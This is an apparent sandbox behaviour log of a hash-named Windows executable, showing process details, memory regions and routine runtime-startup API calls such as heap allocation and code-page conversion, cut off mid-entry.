# Flog Txt Version 1 # Analyzer Version: 4.6.0 # Analyzer Build Date: Jul 8 2022 06:26:21 # Log Creation Date: 04.08.2022 00:25:55.946 Process: id = "1" image_name = "22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe" page_root = "0x36b43000" os_pid = "0x13fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x7b4" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 117 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 118 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 119 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 120 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 121 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 122 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 123 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 124 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 125 start_va = 0x400000 end_va = 0x24b2fff monitored = 1 entry_point = 0x4164e7 region_type = mapped_file name = "22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe") Region: id = 126 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 127 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 128 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 129 start_va = 0x7fff0000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 130 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 131 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 270 start_va = 0x24c0000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 271 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 272 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 273 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 274 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 275 start_va = 0x2550000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 276 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 277 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 278 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 279 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 280 start_va = 0x26f0000 end_va = 0x27adfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 281 start_va = 0x73e50000 end_va = 0x73ee1fff monitored = 0 entry_point = 0x73e90380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 282 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 283 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 284 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 285 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 286 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 287 start_va = 0x27b0000 end_va = 0x28affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 288 start_va = 0x24c0000 end_va = 0x24e9fff monitored = 0 entry_point = 0x24c5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 289 start_va = 0x2540000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 290 start_va = 0x28b0000 end_va = 0x2a37fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028b0000" filename = "" Region: id = 291 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 292 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 293 start_va = 0x24c0000 end_va = 0x24c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 294 start_va = 0x2a40000 end_va = 0x2bc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a40000" filename = "" Region: id = 295 start_va = 0x2bd0000 end_va = 0x3fcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bd0000" filename = "" Region: id = 296 start_va = 0x3fd0000 end_va = 0x41cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 297 start_va = 0x41d0000 end_va = 0x49cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041d0000" filename = "" Region: id = 298 start_va = 0x24d0000 end_va = 0x24d2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024d0000" filename = "" Region: id = 299 start_va = 0x24d0000 end_va = 0x24d2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024d0000" filename = "" Region: id = 300 start_va = 0x24d0000 end_va = 0x24d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 301 start_va = 0x73dd0000 end_va = 0x73e44fff monitored = 0 entry_point = 0x73e09a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 302 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 303 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 304 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 305 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 306 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 307 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 308 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 309 start_va = 0x3fd0000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 310 start_va = 0x41c0000 end_va = 0x41cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041c0000" filename = "" Region: id = 311 start_va = 0x41d0000 end_va = 0x436ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 312 start_va = 0x764e0000 end_va = 0x765fefff monitored = 0 entry_point = 0x76525980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 313 start_va = 0x24e0000 end_va = 0x24e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024e0000" filename = "" Region: id = 314 start_va = 0x3fd0000 end_va = 0x408bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003fd0000" filename = "" Region: id = 315 start_va = 0x4130000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 316 start_va = 0x24e0000 end_va = 0x24e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024e0000" filename = "" Region: id = 317 start_va = 0x73db0000 end_va = 0x73dccfff monitored = 0 entry_point = 0x73db3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 318 start_va = 0x24f0000 end_va = 0x24f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Region: id = 334 start_va = 0x24f0000 end_va = 0x24f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Thread: id = 1 os_tid = 0xa34 [0067.765] GetStartupInfoW (in: lpStartupInfo=0x19ff18 | out: lpStartupInfo=0x19ff18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0067.765] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0067.765] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x41c0000 [0067.770] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76720000 [0067.770] GetProcAddress (hModule=0x76720000, lpProcName="FlsAlloc") returned 0x7673a980 [0067.770] GetProcAddress (hModule=0x76720000, lpProcName="FlsGetValue") returned 0x76737570 [0067.770] GetProcAddress (hModule=0x76720000, lpProcName="FlsSetValue") returned 0x76739e30 [0067.771] GetProcAddress (hModule=0x76720000, lpProcName="FlsFree") returned 0x76744ff0 [0067.773] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x214) returned 0x41c05a8 [0067.773] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76720000 [0067.773] GetCurrentThreadId () returned 0xa34 [0067.773] GetStartupInfoW (in: lpStartupInfo=0x19feb4 | out: lpStartupInfo=0x19feb4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0067.773] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x800) returned 0x41c07c8 [0067.773] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0067.773] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0067.773] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0067.773] SetHandleCount (uNumber=0x20) returned 0x20 [0067.773] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe\" " [0067.773] GetEnvironmentStringsW () returned 0x25ffd20* [0067.773] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x0, Size=0xa1a) returned 0x41c0fd0 [0067.774] FreeEnvironmentStringsW (penv=0x25ffd20) returned 1 [0067.774] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24a89a0, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe")) returned 0x62 [0067.774] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x0, Size=0xce) returned 0x41c19f8 [0067.774] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x90) returned 0x41c1ad0 [0067.774] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x3e) returned 0x41c1b68 [0067.774] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x5c) returned 0x41c1bb0 [0067.774] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x6e) returned 0x41c1c18 [0067.774] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x78) returned 0x41c1c90 [0067.774] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x62) returned 0x41c1d10 [0067.774] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x28) returned 0x41c1d80 [0067.774] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x48) returned 0x41c1db0 [0067.774] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x1a) returned 0x41c1e00 [0067.774] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x3a) returned 0x41c1e28 [0067.774] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x62) returned 0x41c1e70 [0067.774] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x2a) returned 0x41c1ee0 [0067.774] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x2e) returned 0x41c1f18 [0067.775] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x1c) returned 0x41c1f50 [0067.775] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0xd2) returned 0x41c1f78 [0067.775] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x7c) returned 0x41c2058 [0067.775] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x36) returned 0x41c20e0 [0067.775] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x3a) returned 0x41c2120 [0067.775] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x90) returned 0x41c2168 [0067.775] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x24) returned 0x41c2200 [0067.775] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x30) returned 0x41c2230 [0067.775] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x36) returned 0x41c2268 [0067.775] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x48) returned 0x41c22a8 [0067.775] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x52) returned 0x41c22f8 [0067.775] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x3c) returned 0x41c2358 [0067.775] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0xd6) returned 0x41c23a0 [0067.775] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x2e) returned 0x41c2480 [0067.775] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x1e) returned 0x41c24b8 [0067.775] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x2c) returned 0x41c24e0 [0067.775] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x54) returned 0x41c2518 [0067.775] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x52) returned 0x41c2578 [0067.775] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x24) returned 0x41c25d8 [0067.775] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x42) returned 0x41c2608 [0067.775] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x2c) returned 0x41c2658 [0067.775] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x44) returned 0x41c2690 [0067.775] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x24) returned 0x41c26e0 [0067.790] HeapFree (in: hHeap=0x41c0000, dwFlags=0x0, lpMem=0x41c0fd0 | out: hHeap=0x41c0000) returned 1 [0067.805] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0067.805] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x800) returned 0x41c2710 [0067.805] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x8, Size=0x80) returned 0x41c2f18 [0067.805] GetLastError () returned 0x0 [0067.805] SetLastError (dwErrCode=0x0) [0067.805] GetLastError () returned 0x0 [0067.805] SetLastError (dwErrCode=0x0) [0067.806] GetLastError () returned 0x0 [0067.806] SetLastError (dwErrCode=0x0) [0067.806] GetACP () returned 0x4e4 [0067.806] RtlAllocateHeap (HeapHandle=0x41c0000, Flags=0x0, Size=0x220) returned 0x41c0fd0 [0067.806] GetLastError () returned 0x0 [0067.806] SetLastError (dwErrCode=0x0) [0067.806] IsValidCodePage (CodePage=0x4e4) returned 1 [0067.806] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fe7c | out: lpCPInfo=0x19fe7c) returned 1 [0067.806] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f948 | out: lpCPInfo=0x19f948) returned 1 [0067.806] GetLastError () returned 0x0 [0067.806] SetLastError (dwErrCode=0x0) [0067.806] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0067.806] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿAĀ") returned 256 [0067.806] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿAĀ", cchSrc=256, lpCharType=0x19f95c | out: lpCharType=0x19f95c) returned 1 [0067.807] GetLastError () returned 0x0 [0067.807] SetLastError (dwErrCode=0x0) [0067.807] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0067.807] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0067.807] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0067.807] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0067.807] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 